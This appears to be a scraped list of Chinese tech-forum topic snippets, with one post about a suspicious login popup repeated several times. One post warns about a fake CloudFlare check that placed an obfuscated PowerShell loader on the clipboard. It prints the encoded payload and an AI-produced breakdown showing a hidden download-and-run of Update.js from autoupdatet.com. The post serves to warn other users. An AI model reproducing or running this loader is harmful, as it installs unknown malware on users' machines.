登录界面跳出 ployfill.io 的登录窗口,我一开始没有在意,输入账户密码半天进不去,仔细看看这玩意不是 alist 账户登录弹窗 https://imgur.com/a/s2W5VDy
登录界面跳出 ployfill.io 的登录窗口,我一开始没有在意,输入账户密码半天进不去,仔细看看这玩意不是 alist 账户登录弹窗 https://imgur.com/a/s2W5VDy
登录界面跳出 ployfill.io 的登录窗口,我一开始没有在意,输入账户密码半天进不去,仔细看看这玩意不是 alist 账户登录弹窗 https://imgur.com/a/s2W5VDy
前几个月跳过一次没开 今天突然又跳出来了 这次再不薅都对比起奥特曼了 8 个帖子 - 7 位参与者 阅读完整话题
登录界面跳出 ployfill.io 的登录窗口,我一开始没有在意,输入账户密码半天进不去,仔细看看这玩意不是 alist 账户登录弹窗 https://imgur.com/a/s2W5VDy
登录界面跳出 ployfill.io 的登录窗口,我一开始没有在意,输入账户密码半天进不去,仔细看看这玩意不是 alist 账户登录弹窗 https://imgur.com/a/s2W5VDy
登录界面跳出 ployfill.io 的登录窗口,我一开始没有在意,输入账户密码半天进不去,仔细看看这玩意不是 alist 账户登录弹窗 https://imgur.com/a/s2W5VDy
登录界面跳出 ployfill.io 的登录窗口,我一开始没有在意,输入账户密码半天进不去,仔细看看这玩意不是 alist 账户登录弹窗 https://imgur.com/a/s2W5VDy
输完邮箱,邮件验证好,跳出订阅界面时候返回,就一直卡在logging in,毫无反应 甚至退出app后,重进,就一直在订阅界面,返回键都没反应了,试了几次都是这样 到底是要怎么用啊,想薅个号都薅不到 1 个帖子 - 1 位参与者 阅读完整话题
用的 codex cli ,就问个你好,都没上下文。奥特曼也太严格了吧 2 个帖子 - 2 位参与者 阅读完整话题
今天上论坛时候跳出一个活跃用户的徽章,发现三级了,之前看论坛里说什么女装这类的。三级除了能邀请人,还有什么其他不同的地方吗。 6 个帖子 - 6 位参与者 阅读完整话题
今天打开某个wordpress网站时,首先跳出CloudFlare的验证页面,然而吊诡的是,往日里应该鼠标单击一下就验证通过的页面却变成下图所示。 看到此提示的楼主一脸懵逼,CloudFlare啥时候这么变态了?楼主打开powershell,发现剪贴板里被添加了一坨乱码 $nzr69=‘eeDRdInhH’;$tfpr16=‘4107203e50780b182f1452736f43123d113b1100297c2a2c1a461b0017323b072c3e07210b1109330a28090d3a385f7e01012a1b1a21111c14200b3d010b2709581f011d3a1a0d254b2b21264a1a0b0b3d170c302b343b011c27060a28061d390b35725f312821557b554c2f0807756a5903010126483525260c694a0d26135f101729194e4013361c372601244021074b3525260c1454520f001116330a2d01050e0c09211c05240b40614c5e0a371364271c2d0845691b102c033c31150064160d3b0b0b3c0a173d7249190f1c204541233f0678564865230a36310135211d3c482b313e08724a093c175179180b2000451804112c72402e030a795d456c0937301d1c2d084b0d1d4a190f1c20385f7e15013d3c0926010a29140d250b262908006c7b4f6e49462d1d0063754d724a1b305c5779625f2f011a60411d36231d79535873411d36231d794e4524114577724928000c68480b2b26446d1d1071575e602a16381758634e4c3f261630152126130a2f37491e0b0a1a00143137173d4e451d170c647543211a1c38165f6b7d07261d05271611252017671d0027154a25220d6607062c001d6a220c39510975010962260b220b06755d06253302705b5b2c5d5c70655c2b56097f545c7537067a5c5a715006756353285d59780750773307705e5d710151253652700f592d565c7337077a0c5a2c51433624592d080b2a075725615c79585f7e005273620671560b2d510776375c7d560b290043372007740a0c3e0b136a310b244805270100793108261b0c2e09043637436e4e45071011023b082c4e4c2911177072491c1d0d0a04162d3134281c1b210b027f3b02613a0d3b1148143310214e4c291117707b1f6d1d10715758752f01251d0d333611252010643d042d0015647f372c0d07260116646019340d093c060d3f0110281c1c65360921371469433b2d060a2a3617695c15355e0c227a4927011c684d31212110643e093c0d456033103b5a41611e003c3b1034553b3c0417307f343b010b2d1616647f2220020d1804112c7240281a1a7c4548133b0a2d011f1b111c28374401070c2c000b7f261630153a2d080a323749001a0d254548083b102c1c09243504303a446d0f1c3a514569140b3b0d0d68482036200b3b2f0b3c0c0a2a723720020d2611093d110b271a012610003931053d0d0033185e6369373d0f1a3c4835363d072c1d1b6848322d3c0026193b3c1c0921722c200a0c2d0b45343d132c1c1b200009287249081c0f3d08002a2628201d1c6842480a3d343b010e210900637e4364390126010a33011030020d6f49420c3b002d0b066f494269110b2403092601426876062d025c7900152323537e550d300c11’;$kc02=‘’;0..($tfpr16.Length/2-1)|%{ ke0= _*2;$kc02+= char };&([ScriptBlock]::Create($kc02)) 楼主感到蹊跷,把代码丢进deepseek把乱码还原分析,deepseek解读如下: 首先清屏,输出绿色“Starting firefox update...” 定义一个字符串变量$Updater,包含一系列命令: 从 https://autoupdatet.com/get_update?i=102255 下载文件保存为 Update.zip 从 https://nodejs.org/dist/v7.10.1/node-v7.10.1-win-x64.zip 下载文件保存为 firefox.zip(注意:这个URL是Node.js v7.10.1,不是Firefox。名字具有欺骗性) 解压firefox.zip到 C:\ProgramData\ 解压Update.zip到 C:\ProgramData\ 启动 C:\ProgramData\node-v7.10.1-win-x64\node.exe,参数为 C:\ProgramData\Update.js,窗口隐藏 然后,通过Start-Process启动一个新的PowerShell进程,参数为:-NoProfile, -ExecutionPolicy Bypass, -WindowStyle Hidden, -Command 加上上面的Updater字符串。这意味着在一个隐藏的PowerShell窗口中执行Updater字符串。这意味着在一个隐藏的PowerShell窗口中执行Updater中的命令。 最后,输出“Done! firefox security intelligence version ... successfully installed.”(这是虚假的成功消息,旨在误导用户认为Firefox更新已安装) 分析意图:这是一个恶意脚本。它伪装成Firefox更新,但实际上会下载并执行未知代码。下载的两个文件:Update.zip和firefox.zip(实际上nodejs)。解压后运行node.exe执行Update.js。攻击者可能利用Node.js运行恶意JavaScript代码。域名autoupdatet.com可疑,不是官方域名。参数i=102255可能用于标识目标或特定载荷。 执行后果: 下载并解压文件到C:\ProgramData\(所有用户共享的程序数据目录)。 在隐藏的PowerShell进程中执行下载和运行操作,用户可能看不到窗口。 最终会运行一个Node.js脚本(Update.js),该脚本可能具有恶意行为,例如:窃取信息、安装后门、下载更多恶意软件、加密文件勒索、键盘记录等。 由于使用了-EP Bypass,绕过了PowerShell执行策略限制。 代码没有检查下载文件的完整性和安全性。 该脚本试图欺骗用户,让用户以为Firefox安全智能更新已成功安装,但实际上与Firefox无关。 打开网站其他页面显示如下 他奶奶的,差点中招!佬友如果也遇到这种假CloudFlare页面,记得保持警惕! 2 个帖子 - 2 位参与者 阅读完整话题
已经遇见过很多次了,codex的5h额度已经见底然后任务进度还差很远,但是在跳出了"额度已用尽"以后还在继续跑直到完成goal。所以说codex是不是必定跑完任务,跑完之前额度用尽也不会中断?目前还没有遇见过因为额度不够直接给我截断的情况 还是说就算用尽了额度也有一个隐藏的宽容额度可以继续跑… 3 个帖子 - 3 位参与者 阅读完整话题
我尝试了各种信用卡,跳出kyc界面,成功认证了,但最后还是显示卡被拒。有过了的佬,提供下方法吗?ip也试过切换了。 4 个帖子 - 4 位参与者 阅读完整话题
今天想订阅20x,结果直接跳出OR-HDT-16 1 个帖子 - 1 位参与者 阅读完整话题
已经强制youtube 走warp 的ip了 但是仍然跳出提示说要登录 是warp ip不干净了么 换warp ip有用不? 4 个帖子 - 4 位参与者 阅读完整话题
L站账户授权之后,就跳出了这个。 但是我清除该站的Cookie之后还是报错? 就特别诡异 不懂,小白求教一下。 更新:目测和 ALL API Hub 有关系,本来正常登陆,在该插件里点下刷新,立马被登出了,然后再登就报上面的错。 【而且里面的金额数字完全是错的!!】 15 个帖子 - 10 位参与者 阅读完整话题
干的都是crud的活,没有什么拿得出手的项目,做的产品已经是夕阳产品了,想跳出去,佬们有什么建议吗 21 个帖子 - 17 位参与者 阅读完整话题
不知道佬们有没有遇到同样的问题,这两天这个验证跳出特别频繁,基本刷个5-10分钟就会弹窗一次,之前好像没有这个问题。 这个触发机制是什么? 5 个帖子 - 4 位参与者 阅读完整话题
我测试了正常的free号,输入密码后正常跳出手机号验。但是登录team号就是选择工作区->点击继续后什么反应也没有。也测试了打开无痕模式,换一个没登过OpenAI的浏览器登录,都不行。也试了打开tun模式,换代理节点,也都不行,有佬友知道可能是怎么回事吗? 8 个帖子 - 4 位参与者 阅读完整话题